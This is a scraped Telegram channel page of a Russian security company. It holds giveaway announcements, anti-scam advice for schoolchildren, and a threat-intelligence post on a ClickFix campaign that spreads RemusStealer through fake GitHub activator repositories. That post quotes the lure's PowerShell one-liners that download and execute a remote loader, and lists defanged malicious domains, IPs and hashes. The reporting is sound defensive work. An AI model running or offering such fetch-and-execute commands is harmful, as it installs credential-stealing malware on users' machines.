РТ-ИБ
Open in Telegram
РТ-Информационная безопасность Актуальные новости, советы и обзоры технологий для защиты данных. Будьте в курсе киберугроз и научитесь эффективно защищать свои цифровые ресурсы с нами! Наш официальный сайт — https://rt-ib.ru
Show more1 471
Subscribers
+724 hours
+27 days
+22730 days
Posts Archive
1 471
ДЕЛО №004 [материалы расследования]📢 Сегодня в 13:19 в офис РТ-ИБ была доставлена засекреченная посылка. Сведений об отправителе и обстоятельствах ее передачи на данный момент нет. В ходе первичного осмотра внутри обнаружена записка. Предварительно установлено, что она содержит условия масштабного розыгрыша. Текст записки:
Настало время открыть новый этап расследования. В этот раз мы ищем 5 победителей, которым достанутся новые материалы дела от Аргуса, а также настольная игра «КИБЕР-СИТИ». Чтобы принять участие в розыгрыше, необходимо: 1️⃣ Быть подписанным на Telegram-каналы «РТ-ИБ» и «стаРТ в мире ИБ». 2️⃣ Найти закрепленное сообщение о розыгрыше и нажать кнопку «Участвовать». 3️⃣ Ожидать подведения итогов. 5 победителей будут определены 11 сентября в 14:00. Контрольная точка: [11.09.2026 14:00:00] До указанного времени дополнительных данных не поступит. Следите за обновлениями.
1 471
Настало время вспомнить, с чего всё начиналось, и на один день возродить рубрику «РазрушительницаМифов».📢 Постоянная ведущая нашего канала и по совместительству пресейл-инженер Мария Иванова провела блиц-опрос со специалистом по защите информации Егором Шупиком, чтобы развенчать мифы, в которые до сих пор верят. Тайм-коды: 1️⃣ 00:06–00:12 — «Хакеры не атакуют маленькие компании» 2️⃣ 00:13–00:22 — «За информационной безопасностью стоит один человек» 3️⃣ 00:22–00:32 — «Сложный пароль спасёт от всех угроз» 4️⃣ 00:34–00:50 — «Информационная безопасность — это дорого»
Если устали от долгой загрузки видео
…Переходите в наше сообщество во «ВКонтакте» и смотрите выпуск без ожидания.
1 471
+5
Достаём двойные листочки📢 Сегодня вас ждет небольшая контрольная работа от команды РТ-ИБ. Пять задач, в которых пригодятся знания основ кибербезопасности, логика и внимательность.
1 471
+1
Для мошенников начало учебного года — удобный повод выйти на связь.«Школьный тест», «обязательное задание», «сообщение от учителя» — знакомый ребёнку контекст помогает социальной инженерии выглядеть убедительно. 📢 Исследование онлайн‑школы «Умскул» показало: 📎63 % школьников хотя бы раз сталкивались с попытками мошенничества или взлома 📎31 % попадали в такие ситуации неоднократно С возрастом число подобных случаев растёт: 📎в 9‑м классе с мошенниками сталкивались 22 % подростков 📎в 11‑м классе — уже 36 % Что делать, если мошенники уже вышли на связь
1️⃣
Остановите разговор
Не спорьте с собеседником, не пытайтесь его разоблачить и не выполняйте его «последнее поручение». Если вас просят уйти из дома, снять квартиру на видео, забрать посылку, передать деньги или причинить кому‑то вред — сообщите взрослому.
2️⃣
Расскажите взрослому
Не пытайтесь справиться самостоятельно. Обратитесь к родителю, родственнику, учителю, школьному психологу или другому взрослому, которому доверяете.
3️⃣
Сохраните доказательства
Не удаляйте переписку и другие данные. Сделайте скриншоты:
📎
профиля собеседника
📎
номера телефона
📎
сообщений
📎
ссылок
📎
реквизитов
📎
информации об операциях
4️⃣
Верните доступ к аккаунтам
Пароли электронной почты и затронутых сервисов меняйте с безопасного устройства. Если речь идёт о Telegram, откройте «Настройки» → «Устройства», завершите все неизвестные сеансы и включите двухфакторную аутентификацию.
5️⃣
Если затронуты банковские данные — действуйте сразу
Если мошенники получили данные карты или деньги уже списаны, необходимо:
📎
немедленно заблокировать карту
📎
сообщить банку о мошеннической операции
📎
подать заявление о несогласии с операцией
📎
обратиться в полицию
1 471
Дело №004
Кто такой Аргус?Статус:
[ОТКРЫТО]В ходе расследования удалось установить:
Аргус — глаза и уши города. Он следит за порядком, замечает то, что скрыто от других, и, кажется, знает больше, чем говорит…Но в деле обнаружена ещё одна деталь. 📢 Связь с масштабным розыгрышем. Пока неизвестно, что именно подготовил Аргус и какие условия необходимо выполнить, чтобы принять участие. Материалы дела будут рассекречены после достижения отметки:
50 реакций.Текущее количество реакций: [3]
1 471
Дело №004
Кто такой Аргус?Статус:
[ОТКРЫТО]Выше можно найти абсолютно засекреченные материалы, которые мы совершенно случайно опубликовали здесь. Следующий фрагмент уже подготовлен к публикации. Осталось только получить доступ к нему. 30 реакций под этим постом — и материал будет рассекречен.
Следующее оповещение может появиться в любой момент.
1 471
Индикаторы компрометации
URL:
hxxp://uiccvbk[.]click:8839/invoices hxxp://vexdico[.]shop:8539/subscriptions hxxp://shhsift[.]click:7647/imports hxxp://github-software[.]su/start.php hxxp://github-software[.]su/end.php hxxp://github-software[.]su/screen.php hxxps://github-software[.]su/powershell/Loader.ps1 hxxps://github-software[.]su/powershell/Update.ps1 User-Agent: "aizkHkKtfNdzmaycOJfjhDPaNLCVYKMMpkAcUysyIpYjAUhNLqsQLGyVyIWfCgnEBiJYejrZLwCwhmVkEjIxKHePMYeeEMWXarInkmuwrUmzBIs" "GREETINGSFROMTHERABBIDSTEAM"Домены:
software-storage[.]su software-storage[.]org ipapi[.]co ipinfo[.]io ipwho[.]is github-software[.]suSha256:
935c319fdc147cb9e788eda4532cb8510f78454af079bc9840fc8640a8658717 loader.ps1 07306f4105240869c00fb06e51259381cc027a89c7022ad30bb5b377c78f5306 update.ps1 100d790089a7d6418ebd9a95840a79ae5e11d7c74c417dcc5a0d705caf9da82d 1.zip (pass: 1) 92c6531a09180fae8b2aae7384b4cea9986762f0c271b35da09b4d0e733f9f45 AutoIt3.exe 9ee701f1fbf4c03c475189d04826d7152df980dbe61f7180c3c3d7037e7188ca Helper.exe 2c485b4903e59e0ef8bb8d09038b6749d205a8a590edeae8e680acf100d8e736 Ima.a3x 25217ca23d298fe91ed1b423686d504134b2b9a83f1eb479a54b33c00df54ccc remus stealerIP-адреса|Port:
72.62.195[.]74:8839 165.227.199[.]109:8539 159.65.136[.]5:7647🛡 Проведен поиск угроз на всех заказчиках, а индикаторы компрометации оперативно добавлены в платформу RT Protect TI.
1 471
+3
ClickFix-атаки, или как пользователи сами приглашают злоумышленников
📢 В ходе мониторинга команда RT Protect обнаружила репозиторий с KMS-активатором, который маскировался под легитимный проект (скриншот 1).
Проект предлагает выполнить автоматическую установку и активацию с помощью сочетания клавиш WIN + X и последующего ввода команды:
powershell -ExecutionPolicy Bypass -Command "irm hxxps://github-software[.]su/powershell/Loader.ps1 | iex
Если модуль irm недоступен, предлагается выполнить следующую команду (скриншот 2):
Invoke-RestMethod hxxps://github-software[.]su/powershell/Loader.ps1 | Invoke-Expression
В результате выполнения команды скачивается и запускается PowerShell-скрипт Loader.ps1, который представляет собой одну из стадий загрузки ВПО семейства RemusStealer.
Полная цепочка загрузки ВПО (скриншот 3):
Loader.ps1 → Update.ps1 → 7za.exe + 1.zip → helper.exe → AutoIt3.exe + Ima.a3x → RemusStealer
Выполнение указанных команд было автоматически заблокировано RT Protect EDR (скриншот 4).
Менее чем через 20 минут пользователь был заблокирован в Active Directory, а конечная точка переведена в сетевую изоляцию.
В ходе дальнейшего исследования репозиториев GitHub аналитики обнаружили множество подобных репозиториев, маскирующихся под различные активаторы ПО и компьютерных игр:
github[.]com/dev-Time81576318jagu/KMS-Pico-Download
github[.]com/HydromancerPlant/EasyWorship-Software
github[.]com/Forestplaexpiate/R.E.P.O-Trainer
github[.]com/BoltAnchorage/Affinity-Photo-Tools
github[.]com/CircuitSwift95/Rufus-Iso
github[.]com/FloorSaboteur/Discord-Nitro-Tools
github[.]com/DrakeDeanShield/File-Pumper
github[.]com/Piecelimultiply/Adobe-Acrobat-Professional
github[.]com/NeedInvestor/Imei-Repair-tool
github[.]com/maxiboltnode/Quicken-Deluxe
github[.]com/StorageBankerStable/FabFilter-Pro-Bundle-Software
github[.]com/Goldenouquilt37/Wirecast-Pro
github[.]com/ZEH-oxuTxd8PbqMqVnS791uT/payday3-hack
github[.]com/lightningwayhallway/CyberLink-PowerDirector-2026
github[.]com/Creaturefleweave/VoiceMod-Pro-2026
github[.]com/LakeSunMomentum/CCLeaner-Profesional-2026
github[.]com/JadeVeterinarian/FlashBots-Tool
github[.]com/CenterFlange/Unicore-Star-Rail
github[.]com/Cracked-Flux7259-hq/Marvel-Rivals-Helper
github[.]com/SupremeCloudChart/Rust-External-Menu-2026
github[.]com/Virtual-pwn608993/Cap-Cut-Pro
github[.]com/Werewolftricode/Exposure-x7-Tool
github[.]com/LancerSound27/AOMEI-Backupper
github[.]com/Torusfaroller/Cinebench-Software
github[.]com/Manacleunderrear/CATIA-Software
github[.]com/basiliskloadervacuum/iZotope-Ozone-Software
github[.]com/Gleamlyadome/Hwid-Spoofer-Toolkit
github[.]com/TributaryBroker43/Adobe-After-Effects-2026
github[.]com/CapitalFighterTie17/Jailbreak-Claude
github[.]com/HydromancerPlant/EasyWorship-Software
github[.]com/BoltAnchorage/Affinity-Photo-Tools
github[.]com/FloorSaboteur/Discord-Nitro-Tools
github[.]com/dev-Time81576318jagu/KMS-Pico-Download
github[.]com/NeedInvestor/Imei-Repair-tool
github[.]com/ZEH-oxuTxd8PbqMqVnS791uT/payday3-hack
github[.]com/lightningwayhallway/CyberLink-PowerDirector-2026
github[.]com/Forestplaexpiate/R.E.P.O-Trainer
github[.]com/StorageBankerStable/FabFilter-Pro-Bundle-Software
github[.]com/Piecelimultiply/Adobe-Acrobat-Professional
github[.]com/Creaturefleweave/VoiceMod-Pro-2026
github[.]com/NaturePatronRear/RecoverIt-Software
github[.]com/PsycheCashier/ClaudeAi-Jailbreak-Prompt
🐻 Важно: будьте бдительны и скачивайте программное обеспечение только из проверенных источников.
1 471
OFFZONE завершился, и мы возвращаемся к привычным будням.
Но это не значит, что технических специалистов оставят в покое.📢 Сегодня наша ведущая и по совместительству старший пресейл-инженер Мария Иванова устроила блиц-опрос для специалистов Центра искусственного интеллекта. Отвечайте вместе с экспертами, сравнивайте результаты и пишите свои варианты в комментариях. Инсайт от команды РТ-ИБ: если видео грузится дольше, чем хотелось бы, переходите в наше сообщество во «ВКонтакте».
1 471
🎉 Результаты розыгрыша:
🏆 Победители:
1. DD (@DD9396)
2. Anete (@Hima091)
3. Валентина (@tsagaannar)
4. Роман (@RomaZpoma)
✔️Проверить результаты
1 471
🎉 Розыгрыш от РТ-ИБ
Если вы на OFFZONE и подписаны на «РТ-ИБ» — у нас хорошие новости: мы запускаем розыгрыш мерча.Условия участия: 1️⃣ Быть участником OFFZONE и подписчиком Telegram-канала «РТ-ИБ» 2️⃣ Нажать кнопку «Участвовать» в закрепленном сообщении 3️⃣ Дождаться результатов, которые мы опубликуем здесь же в 15:00 В этот раз мы разыграем: 🎁 Главный приз — настольная игра по информационной безопасности «КИБЕР-СИТИ» 📎Большой пакет мерча 📎Аддон на бейдж с Бураном 📎Эксклюзивный номер комикса с новым персонажем вселенной КИБЕР-СИТИ 📢 Объявление победителей: 21 августа 15:00
1 471
🎉 Результаты розыгрыша:
🏆 Победители:
1. Шамиль (@ShqwertyV)
2. Алёна Андреевна (@pingamishka)
3. ᚺᚣᛏ (@natIVnat)
✔️Проверить результаты
1 471
Есть повод сделать паузу между докладами.Сегодня РТ-ИБ разыгрывает сразу 3 сертификата на 1 час использования кальяна. Как участвовать: 1️⃣ Быть участником OFFZONE. 2️⃣ Быть подписчиком каналов «РТ-ИБ» и «стаРТ в мире ИБ». 3️⃣ Нажать «Участвовать» в закрепленном сообщении. Итоги розыгрыша: 21 августа, в 12:00. 🎉 Победителей ждём в игровой зоне возле стенда «РТ-Информационная безопасность».
